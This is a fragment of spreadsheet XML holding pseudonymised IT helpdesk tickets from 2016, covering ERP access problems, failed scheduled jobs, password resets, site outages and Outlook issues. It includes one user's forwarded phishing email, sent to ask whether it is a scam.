    <s v="_x000d__x000a__x000d__x000a_received from: byclpwmv.esafrtbh@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_reisekostenabrechnung in erp leider nicht mÃ¶glich. siehe fehlermeldung unten:_x000d__x000a_[cid:image001.jpg@01SID_35be6.bd6e34b0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="byclpwmv esafrtbh"/>
    <x v="9"/>
  </r>
  <r>
    <s v="power outage : usa- (company) site hard down since 4:15 am et on 10/01"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________4:15 am et on 10/01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no_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engineering_tool new customer creation please refer : inplant_864166"/>
    <s v="_x000d__x000a__x000d__x000a_received from: skmdgnuh.utgclesd@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_still i am not able create new customer in engineering_tool, please resolve the issues at the earliest._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35be1.7d820430]_x000d__x000a__x000d__x000a_with warm "/>
    <s v="skmdgnuh utgclesd"/>
    <x v="25"/>
  </r>
  <r>
    <s v="have problem to access erp hana-urgent"/>
    <s v="_x000d__x000a__x000d__x000a_received from: neokfwiy.ufriscym@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_same issue repeated again, have problem to use the programdnty._x000d__x000a__x000d__x000a_please help to solve the issue aerp, need to run &amp; submit the report on oct 3, 2016_x000d__x000a__x000d__x000a_best "/>
    <s v="neokfwiy ufriscym"/>
    <x v="0"/>
  </r>
  <r>
    <s v="email id: spelling error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: santthyumar.shtyhant@company.com_x000d__x000a__x000d__x000a_dear sir/madam,_x000d__x000a__x000d__x000a_there is a correction needed in spelling of my email id_x000d__x000a__x000d__x000a_existing email id: santthyumar.shtyhant@company.com&lt;mailto:santthyumar.shtyhant@company.com&gt;_x000d__x000a__x000d__x000a_email id to be changed to: ploxzuts.utvimnwo@gmail.com&lt;mailto:ploxzuts.utvimnwo@gmail.com&gt;_x000d__x000a__x000d__x000a_pl do the needful_x000d__x000a__x000d__x000a_"/>
    <s v="ploxzuts utvimnwo"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job bkwin_infonet1_full failed in job_scheduler at: 10/01/2016 01:39:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_infonet1_full failed in job_scheduler at: 10/01/2016 01:39:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="windows account  locked "/>
    <s v="windows account  locked "/>
    <s v="zidcxslw clyfdaki"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_564 failed in job_scheduler at: 10/01/2016 00:04:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_564 failed in job_scheduler at: 10/01/2016 00:04:00  "/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="network outage : engineering_toolkuznetsk warehouse - site hard down since 6:32 pm et on 09/30."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________6:32 pm et on 09/30.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_no__    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   __na______     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ______no___     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na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job bkbackup_tool_HostName_768_prod_full failed in job_scheduler at: 09/30/2016 23:59:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_HostName_768_prod_full failed in job_scheduler at: 09/30/2016 23:59:00  "/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_534 failed in job_scheduler at: 10/01/2016 01:04:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_534 failed in job_scheduler at: 10/01/2016 01:04:00  "/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u1 failed in job_scheduler at: 09/30/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u1 failed in job_scheduler at: 09/30/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u2 failed in job_scheduler at: 09/30/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u2 failed in job_scheduler at: 09/30/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job Job_2551 failed in job_scheduler at: 09/30/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2551 failed in job_scheduler at: 09/30/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u6 failed in job_scheduler at: 09/30/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u6 failed in job_scheduler at: 09/30/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job SID_56filesys failed in job_scheduler at: 09/30/2016 22:24:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_56filesys failed in job_scheduler at: 09/30/2016 22:24:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="i was on a skype call when programdnty locked up. after restarting computer several times i can not log into skype as it fre"/>
    <s v="name:wpdxlbhz etvzjmhx_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:wpdxlbhz.etvzjmhx@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i was on a skype call when programdnty locked up. after restarting computer several times i can not log into skype as it freezes every time._x000a_also can not get speaker on laptop (2 in 1 dell device)"/>
    <s v="wpdxlbhz etvzjmhx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3186 failed in job_scheduler at: 09/30/2016 20:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3186 failed in job_scheduler at: 09/30/2016 20:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="laptop battery "/>
    <s v="with full charge (indicates ~3hr 40 mint) but actual life ~ 2 hours.  seeking replacement (original battery, two years old)_x000d__x000a_model:  e7240 (dell - asset number 404917)_x000d__x000a__x000d__x000a_also rubber around screen is separating - can this be replaced/reattached - or should i super glue?"/>
    <s v="kauozcir jlyqxise"/>
    <x v="2"/>
  </r>
  <r>
    <s v="vpv - i get this message when i try to log on to erp using my vpn lately.  everything else works."/>
    <s v="_x000a__x000a_received from: bwfhtumx.japznrvb@gmail.com_x000a__x000a_[cid:image001.jpg@01SID_35b47.e1412191]_x000a__x000a_bwfhtumx japznrvb_x000a_ regional controller_x000a_bwfhtumx.japznrvb@gmail.com&lt;mailto:bwfhtumx.japznrvb@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="bwfhtumx japznrvb"/>
    <x v="0"/>
  </r>
  <r>
    <s v=":i have a new laptop, and tried to log into "/>
    <s v="name:danyhuie deyhtwet_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:rozsyfai.zncajubh@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i have a new laptop, and tried to log into _x000a_enter the employee recognition site"/>
    <s v="rozsyfai zncajubh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool issue"/>
    <s v="engineering_tool issue._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-educated the user on how to use the engineering_tool._x000d__x000a_-issue resolved."/>
    <s v="vnetbgio lqxztben"/>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wbtrvdsi gdbuvszx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to inwarehouse_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nuhfwplj.ojcwxser@gmail.com_x000d__x000a__x000d__x000a_i am unable to force the inwarehouse_tool on the below, also.  this too is consigned material and needs to inwarehouse_tool before the end of today._x000d__x000a_please help._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35b32.40369391]_x000d__x000a__x000d__x000a_"/>
    <s v="nuhfwplj ojcwxser"/>
    <x v="12"/>
  </r>
  <r>
    <s v="end of month billing"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nuhfwplj.ojcwxser@gmail.com_x000d__x000a__x000d__x000a_good afternoon,_x000d__x000a__x000d__x000a_i am unable to force the billing for the below.  this is consigned material and needs to inwarehouse_tool before the end of today._x000d__x000a_please help._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35b31.6e02a420]_x000d__x000a__x000d__x000a_"/>
    <s v="nuhfwplj ojcwxser"/>
    <x v="12"/>
  </r>
  <r>
    <s v="password reset alert from o365 "/>
    <s v="password reset alert from o365 "/>
    <s v="adgvefwp dwasygtb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="global erp crm:  any party change in complaint 7611184394 causes a blank screen upon saving, and the change is not saved"/>
    <s v="global erp crm:  any party change in complaint 7611184394 causes a blank screen upon saving, and the change is not saved._x000d__x000a_please investigate why this is happening and fix the problem."/>
    <s v="aoyrspjv hctgfeal"/>
    <x v="20"/>
  </r>
  <r>
    <s v="ms crm dymanics : outlook client issue."/>
    <s v="_x000a_summary:can you help me set up a crm tab in my outlook ribbon?"/>
    <s v="grtaoivq dwjvfkqe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_865520"/>
    <s v="ticket update on inplant_865520"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="audio issue : windows audio issue ; 7350"/>
    <s v="audio issue : windows audio issue ; 7350"/>
    <s v="vfsjoquc razepdqb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_865554"/>
    <s v="ticket update on inplant_865554"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset from password_management_tool"/>
    <s v="password reset from password_management_tool"/>
    <s v="keinyujo torvxeda"/>
    <x v="0"/>
  </r>
  <r>
    <s v="insufficient permissions on web crm"/>
    <s v="insufficient permissions on web crm"/>
    <s v="qifzkoej etbmgjvo"/>
    <x v="22"/>
  </r>
  <r>
    <s v="company distributor_tool is messed up. i enter through engineering_tool. it will not provide quote. error &quot; no ship-to for account entered"/>
    <s v="does not matheywter which account number i use. major inconvenience"/>
    <s v="jvshydix rzpmnylt"/>
    <x v="21"/>
  </r>
  <r>
    <s v="ms crm dynamics : outlook issue"/>
    <s v="_x000a_summary:i need to have the crm tab added to my computer"/>
    <s v="upcgxthj lnsvemxy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="a solution is needed to find a permanent fix to be able to use memotech."/>
    <s v="a solution is needed to find a permanent fix to be able to use memotech._x000d__x000a__x000d__x000a_add ken.mstipsolutions.com&quot;  to compatibility list"/>
    <s v="fyuqhlcx fjiuhxae"/>
    <x v="38"/>
  </r>
  <r>
    <s v="reset the password for constance m wgtyillsford on erp / production / bw"/>
    <s v="reset the password for constance m wgtyillsford on erp / production / bw"/>
    <s v="sydgvpao aocjqrmz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="euromote entry error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: brhlcpqv.sfozwkyx@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_could you please help me on entering the euromote to open erp from my personel wireless._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35b63.2c18a2d0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="brhlcpqv sfozwkyx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent"/>
    <s v="_x000a__x000a_received from: uezonywf.rldbvipu@gmail.com_x000a__x000a_after password change can't sign in to skype on dell 2 in 1. this has happened before and requires it to access my computer and delete files._x000a__x000a_tommyth duyhurmont_x000a_channel partner sales engineer_x000a_company inc._x000a__x000a_uezonywf.rldbvipu@gmail.com&lt;mailto:uezonywf.rldbvipu@gmail.com&gt;_x000a_www.company.com&lt;_x000a__x000a_[_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="uezonywf rldbvipu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_865534"/>
    <s v="ticket update on inplant_865534"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 1 // finance_vip1 is unable to approve an expense report as its not showing in worklist "/>
    <s v="from: lpoebzsc grknswyo _x000a_sent: friday, september 30, 2016 11:32 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject:  fw: expense report 8111118921 has been submitted._x000a__x000a_good afternoon.  i tried entering an expense report for martha bank.  i sent it for finance_vip1' approval and it is not showing up in his worklist.  _x000a_i recently began supporting finance_vip1 and his team about a month ago.  perhaps something needs to be updated in the system for me to be able enter expense reports on their behalf?_x000a_in the past when i have had issues with ess, i contacted kyefsrjc eadmpzcn, however he is on vacation today._x000a__x000a_your assistance in this matheywter is greatly appreciated._x000a_"/>
    <s v="lpoebzsc grknswyo"/>
    <x v="9"/>
  </r>
  <r>
    <s v="back up tape still is not ejecting."/>
    <s v="back up tape not ejected today. unable to switch out tapes. previously switched them daily."/>
    <s v="hvskpglx bpsfxmon"/>
    <x v="11"/>
  </r>
  <r>
    <s v="rma #6001504109"/>
    <s v="rma #7112615210_x000d__x000a__x000d__x000a_workflow error rma needs to be processed before end of today"/>
    <s v="asxmeruj drqufvgj"/>
    <x v="12"/>
  </r>
  <r>
    <s v="unable to access engineering_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vewdsifl.zjdmftkv@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a_unable to access engineering_tool_x000d__x000a_following error message shown_x000d__x000a_[cid:image001.jpg@01SID_35b73.de8a24b0]_x000d__x000a_request support to resolve_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="vewdsifl zjdmftkv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vitalyst // crm configuration in outlook"/>
    <s v="vitalyst // crm configuration in outlook"/>
    <s v="vfsjoquc razepdqb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to windows to update password on password_management_tool"/>
    <s v="unable to log in to windows to update password on password_management_tool"/>
    <s v="erckhtzj tdmkgoie"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms crm dynamics issue"/>
    <s v="_x000a_summary:i have lost the crm ribbon in outlook."/>
    <s v="aqjdvexo lmedazjo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="mfkvlxph bodikqcx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bwsdslspln failed in job_scheduler at: 09/30/2016 13:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwsdslspln failed in job_scheduler at: 09/30/2016 13:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="login issue"/>
    <s v="login issue_x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-checked the user name in ad all fine_x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="mfkvlxph bodikqcx"/>
    <x v="0"/>
  </r>
  <r>
    <s v=":i am unable to &quot;port.crm.dynamics.com&quot;"/>
    <s v="name:zdcheloy aevzsogn_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:zdcheloy.aevzsogn@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i am unable to &quot;port.crm.dynamics.com&quot;"/>
    <s v="zdcheloy aevzsogn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to distributor_tool as password expired"/>
    <s v="unable to login to distributor_tool as password expired"/>
    <s v="jkelxorm uwqjlzfm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company mobile device activation."/>
    <s v="company mobile device activation"/>
    <s v="xgjkafcn uijphdyx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user &quot;kehtxprg uekapfzt&quot;  is not able to access erp SID_34 "/>
    <s v="hi team, _x000d__x000a__x000d__x000a_need your help!_x000d__x000a__x000d__x000a_request you to check as  user &quot;kehtxprg uekapfzt&quot;  is not able to access erp SID_34 in turn which is blocking him to approve pr. _x000d__x000a__x000d__x000a_"/>
    <s v="kehtxprg uekapfzt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="audio driver issue "/>
    <s v="_x000a_summary:hello,_x000a_my pc is formatheywted by local it but there is no sound.i think audio driver is not installed properly.could you help me ?"/>
    <s v="lanigpkq qzhakunx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset request"/>
    <s v="password reset request"/>
    <s v="jmoqelbc fbzsyjne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="SID_34 password reset"/>
    <s v="name:mityhuch ervuyin_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:rlmbxeso.ulmkxdfi@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i cannot log into netweaver"/>
    <s v="rlmbxeso ulmkxdfi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool access query "/>
    <s v="engineering_tool access query "/>
    <s v="hgizxmvq npzvagqy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dba team - disk space for engg dba is full, can not create safety data sheets any more"/>
    <s v="i figured out that i can not create any new sds any more. this is on the production system_x000a_the engg experts came back with the following issue:_x000a__x000a_hi ,_x000a__x000a_the drive where the engg prod db lives on is full. the dba's have to make it bigger. _x000a_so, it's just a matheywter of having enough disk space._x000a_can you let them know?_x000a__x000a_"/>
    <s v="dmqxwkfr olmwqzpu"/>
    <x v="11"/>
  </r>
  <r>
    <s v="ooo until 5/oct/ : \\HostName_771\teams\materials"/>
    <s v="ooo until 5/oct/_x000d__x000a__x000d__x000a_received from: zxobmreq.udikorhv@gmail.com_x000d__x000a__x000d__x000a_need access to \\HostName_771\teams\materials&lt;file:///\\HostName_771\teams\materials&gt;, on my computer system._x000d__x000a_"/>
    <s v="zxobmreq udikorhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password and engineering tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: peojqgvm.qayeptuo@gmail.com_x000d__x000a__x000d__x000a_i have let my password expire and need help getting back into our systems._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="peojqgvm qayeptuo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please delete the transport SID_35k910404"/>
    <s v="delete the transport from the buffer SID_35k910404"/>
    <s v="oncidblt ucewizyd"/>
    <x v="13"/>
  </r>
  <r>
    <s v="abap report zsd_price_field_update update for rqfhiong zkwfqagb fields not working for me."/>
    <s v="please note that i am receiving an error message when trying to update rqfhiong zkwfqagb fields when using the zsd_price_field_update abap programdnty.  please see screenshots of error message.  i have also attached the uacyltoe hxgaycze file that i was uploading.  i am able to change the material pricing group through transaction mm02.  therefore, i don't think that it is a security problem."/>
    <s v="htsnaodb adjtmlzn"/>
    <x v="12"/>
  </r>
  <r>
    <s v="crm app "/>
    <s v="_x000a__x000a_received from: vybmcrxo.kirxdspz@gmail.com_x000a__x000a_hello,_x000a_trying to load the mobile crm app on iphone and while trying to run, putting in the &quot;we're sorry your server is not available or does not support this application&quot;_x000a__x000a_vybmcrxo kirxdspz_x000a_applications engineer_x000a__x000a_vybmcrxo.kirxdspz@gmail.com&lt;mailto:vybmcrxo.kirxdspz@gmail.com&gt;_x000a__x000a__x000a__x000a_"/>
    <s v="vybmcrxo kirxdspz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot access \\HostName_779\engineering_application from vpn.company using vvblothryor - inc1553079 closed not fixed"/>
    <s v="cannot access \\HostName_779\engineering_application from vpn.company using vvbloor - inc1553079 closed not fixed. please do not assign to vidya. computer lbdl8513228 can access the \\HostName_779\engineering_application using other sign-ons. dudekm signed onto the computer and it works. vvbloor can sign-on to the computer and use dudekm to sign-on to the vpn and it works. it does not work when vvbloor signs-on to the vpn. vvblorytor can access other servers HostName_776, HostName_768. just cannot access HostName_779."/>
    <s v="ajdcnwtb bvijwxko"/>
    <x v="11"/>
  </r>
  <r>
    <s v="travel_tool"/>
    <s v="_x000a__x000a_received from: zdcheloy.aevzsogn@gmail.com_x000a__x000a_my manager was changed to mhtyike szumyhtulas in july but my travel is still going to my previous manager qvhixotw rxutkyha.  i tried to change in travel_tool but it is greyed out.  can this be changed to correct manager?_x000a__x000a_zdcheloy aevzsogn_x000a_manager, business operational excellence_x000a_zdcheloy.aevzsogn@gmail.com&lt;mailto:zdcheloy.aevzsogn@gmail.com&gt;_x000a_"/>
    <s v="zdcheloy aevzsogn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="help with files engineering_tool - error"/>
    <s v="hi team, _x000d__x000a__x000d__x000a_could you please, help user urgapyzt tnxiuramdnty to open files the engineering_tool (engineering_tool)._x000d__x000a__x000d__x000a_he did downloaded the file in site _x000d__x000a_&quot;error the verification (name_file).ktr. the file is with error&quot;. _x000d__x000a__x000d__x000a_this message appears to all files the site. in attachment i'm including the screen with error and the file .zip._x000d__x000a__x000d__x000a_let me know if you have more doubts, you can contact with user. _x000d__x000a__x000d__x000a_"/>
    <s v="urgapyzt tnxiuram"/>
    <x v="25"/>
  </r>
  <r>
    <s v="unable to login to pc"/>
    <s v="windows account locked out."/>
    <s v="kifmqeph srlzgbhw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="logon balancing error in erp "/>
    <s v="logon balancing error in erp "/>
    <s v="umkpayhc adflvbxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="login to citrix tro access erp ; vvparthyrra : password change request from manager"/>
    <s v="login to citrix tro access erp ; vvparthyrra : password change request from manager"/>
    <s v="izhyoqms wecyhadn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop not booting up"/>
    <s v="qksrtvzb vjkftuai said that he spilled some coffee on his laptop yesterday and since then the machine is not booting up and he wants to get this checked and replaced if necessary."/>
    <s v="qksrtvzb vjkftuai"/>
    <x v="2"/>
  </r>
  <r>
    <s v="please create an rma# for the nov-tx return.  "/>
    <s v="please see attachments."/>
    <s v="iytebhvd coerxklt"/>
    <x v="12"/>
  </r>
  <r>
    <s v="ticket update "/>
    <s v="ticket update "/>
    <s v="pbhmwqtz wqlbudjx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="extend the account - vvnewthey - urgent"/>
    <s v="account has expired on september 29th_x000d__x000a_need to extend the account until the end of the year._x000d__x000a__x000d__x000a_need this done as soon as possible, as the employee is assisting with tasks that are related to an employee who is leaving the company today._x000d__x000a_please expedite."/>
    <s v="koiapqbg teyldpkw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="ms crm dymanics : giving error message while loading outlook"/>
    <s v="ms crm dymanics : giving error message while loading outlook"/>
    <s v="hvgdafke mnowgefz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need an update on inplant_865235"/>
    <s v="need an update on inplant_865235"/>
    <s v="ayrhcfxi zartupsw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="synchronization log mails after accepting calendar invite "/>
    <s v="synchronization log mails after accepting calendar invite "/>
    <s v="hduzwpio wrcgunso"/>
    <x v="0"/>
  </r>
  <r>
    <s v="infopath installation "/>
    <s v="infopath installation "/>
    <s v="hvgdafke mnowgefz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="phishing emails uacyltoe hxgaycze query "/>
    <s v="phishing emails uacyltoe hxgaycze query "/>
    <s v="wlsazrce uwehsqbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="[usa] order not moving to to-do list 5 hours after confirmations"/>
    <s v="please see attached ppt, op 20 is confirmed but order is not showing up in op 25's to-do list even after 5 hours. (both ops are in same work center)_x000d__x000a_my understanding is that the background job runs every 15 minutes"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="printer driver not loading properly"/>
    <s v="usa bd05 printer says it needs drivers updated, but continually fails to update or allow printing."/>
    <s v="fgaulydz crswlkev"/>
    <x v="2"/>
  </r>
  <r>
    <s v="engineering tool"/>
    <s v="i am experiencing a reoccurring issue with my erp/engineering tool. i am not able to display original files (pdf's and stp's). this is a major function in my role and unable to complete any work unless it is resolved. this issue occurs every time an upgrade occurs to erp or engineering tool._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="tfyhebmk elywjuvm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="spam email"/>
    <s v="from: vkzwafuh tcjnuswg _x000a_sent: friday, september 30, 2016 6:20 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: amar fw: you must validate your account_x000a__x000a_hi,_x000a_is this a legitimate email or a scam? _x000a__x000a_vkzwafuh tcjnuswg - cmp_x000a_sr. application eng._x000a_vkzwafuh.tcjnuswg@gmail.com_x000a__x000a__x000a_from: cyber-crime dept [mailto:cybercrime@secure.safe-browsing.com] _x000a_sent: friday, september 30, 2016 3:33 am_x000a_to: vkzwafuh tcjnuswg &lt;vkzwafuh.tcjnuswg@gmail.com&gt;_x000a_subject: you must validate your account_x000a__x000a_dear mail user,_x000a_as part of the security measures to secure all email users across the world, all email users are mandated to have their account details registered as requested by the cyber-crime dept._x000a_you are here by required to validate your account within 24 hours so as not to have your email account suspended and deleted from the world email server._x000a_kindly validate your email account to have your account registered, please click here._x000a_"/>
    <s v="vkzwafuh tcjnuswg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need tc48 printer set up"/>
    <s v="i am trying to connect to network printer tc48 located in the tech. center. my computer is having issues finding the correct driver to link to the printer. please assist, "/>
    <s v="ferxqvsm esmwxqlf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook calendar invite issue"/>
    <s v="outloook calendar invites are automatically creating multiple meeting requests when a single meeting entry is sent.  causing issues for customers internal and external by filling inboxes with multiple invites for same meeting and resending invite every day up to the meeting and causing confusion.  please advise help aerp.  "/>
    <s v="urgqkinl zpcokgbj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="computer in tool and cutter is down"/>
    <s v="computer in tool and cutter is down"/>
    <s v="ovxrzwac clhxuzgy"/>
    <x v="2"/>
  </r>
  <r>
    <s v="anmelden bei outlook nicht mÃ¶glich"/>
    <s v="anmelden bei outlook seit passwort Ã¤ndern nicht mÃ¶glich_x000a_tel: "/>
    <s v="cobdhkmj bikjecaz"/>
    <x v="41"/>
  </r>
  <r>
    <s v="adding shared mailbox to outlook"/>
    <s v="adding shared mailbox to outlook"/>
    <s v="tqpbazxm jhbkycgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="workcenter description showing user ids"/>
    <s v="issue reported from us_plant. please see attached picture"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="company center- passwords do not work---- need fixed aerp"/>
    <s v="hi, i created accounts in company center and they aren't working.  can someone please call me as soon as possible?  it would be great if the person who contacts me has access to active directory because i think this may be the problem.  "/>
    <s v="qcfmxgid jvxanwre"/>
    <x v="19"/>
  </r>
  <r>
    <s v="account got locked"/>
    <s v="account got locked"/>
    <s v="djkipmqo hjzeuwrd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool install request"/>
    <s v="non company pc - windows 8.1 operating system - surthryr stahyru"/>
    <s v="ayrhcfxi zartupsw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to load outlook "/>
    <s v="unable to load outlook "/>
    <s v="tbepisvq fxvgltmp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to retrieve deleted emails"/>
    <s v="need to retrieve deleted emails"/>
    <s v="bujghvne cnpdhfmi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="z_chk issue del# 9169472003 "/>
    <s v="hello,_x000d__x000a__x000d__x000a__x000d__x000a_we are facing an issue of the below screen shot. please help us how to resolve this issue. we are very urgent to complete this stragiht away._x000d__x000a__x000d__x000a_"/>
    <s v="iwazgesl ydgqtpbo"/>
    <x v="17"/>
  </r>
  <r>
    <s v="remote SID_1 connection open for oss 344427 / 2016 "/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_1_x000d__x000a__x000d__x000a_enter user id of user having the issue: vv344427 and please copy the same roles of kawtidthry._x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with: va23 _x000d__x000a__x000d__x000a_describe the issue: please open the SID_1 connection to erp and provide remote login data to erp._x000d__x000a__x000d__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000d__x000a__x000d__x000a_provide access the same as this other user:"/>
    <s v="arhjlgdz pxtsjnlk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="india:high latency/packet drops:telecom_vendor_1 sr:25128965 &amp; 25132562 "/>
    <s v="india:high latency/packet drops"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
